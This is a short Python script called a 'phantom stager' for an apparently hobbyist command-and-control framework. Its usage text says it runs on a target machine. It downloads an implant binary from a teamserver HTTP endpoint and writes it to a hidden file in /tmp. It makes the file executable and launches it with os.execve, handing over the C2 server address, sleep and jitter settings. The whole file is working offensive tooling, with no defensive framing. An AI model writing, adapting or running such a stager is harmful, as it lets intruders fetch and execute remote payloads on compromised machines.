#!/usr/bin/env python3
"""
phantom stager — light (neok1ra)

fetches and executes the implant binary from the teamserver's HTTP endpoint.
generated by the server (in theory — the HTTP delivery endpoint is a TODO).
for now: manually set IMPLANT_URL and SERVER_ADDR, run on target.

usage:
    IMPLANT_URL=http://yourserver/implant SERVER_ADDR=yourserver:4444 python3 stager.py
"""

import os
import sys
import stat
import tempfile
import urllib.request
import subprocess

IMPLANT_URL  = os.environ.get("IMPLANT_URL",  "http://127.0.0.1:8080/implant")
SERVER_ADDR  = os.environ.get("SERVER_ADDR",  "127.0.0.1:4444")
SLEEP_MS     = os.environ.get("PHANTOM_SLEEP_MS", "5000")
JITTER       = os.environ.get("PHANTOM_JITTER", "20")

def main():
    print(f"[*] fetching implant from {IMPLANT_URL}")

    try:
        with urllib.request.urlopen(IMPLANT_URL, timeout=10) as r:
            data = r.read()
    except Exception as e:
        print(f"[-] fetch failed: {e}", file=sys.stderr)
        sys.exit(1)

    # write to a temp file and execute
    # mkstemp gives us an fd directly — no TOCTOU on the path
    fd, path = tempfile.mkstemp(prefix=".ph_", dir="/tmp")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)

        os.chmod(path, stat.S_IRWXU)

        env = os.environ.copy()
        env["PHANTOM_SERVER"]   = SERVER_ADDR
        env["PHANTOM_SLEEP_MS"] = SLEEP_MS
        env["PHANTOM_JITTER"]   = JITTER

        print(f"[*] executing as {path}")
        # os.execve replaces the stager process — cleaner than subprocess
        os.execve(path, [path], env)

    except Exception as e:
        print(f"[-] exec failed: {e}", file=sys.stderr)
        try:
            os.unlink(path)
        except OSError:
            pass
        sys.exit(1)


if __name__ == "__main__":
    main()
# stager
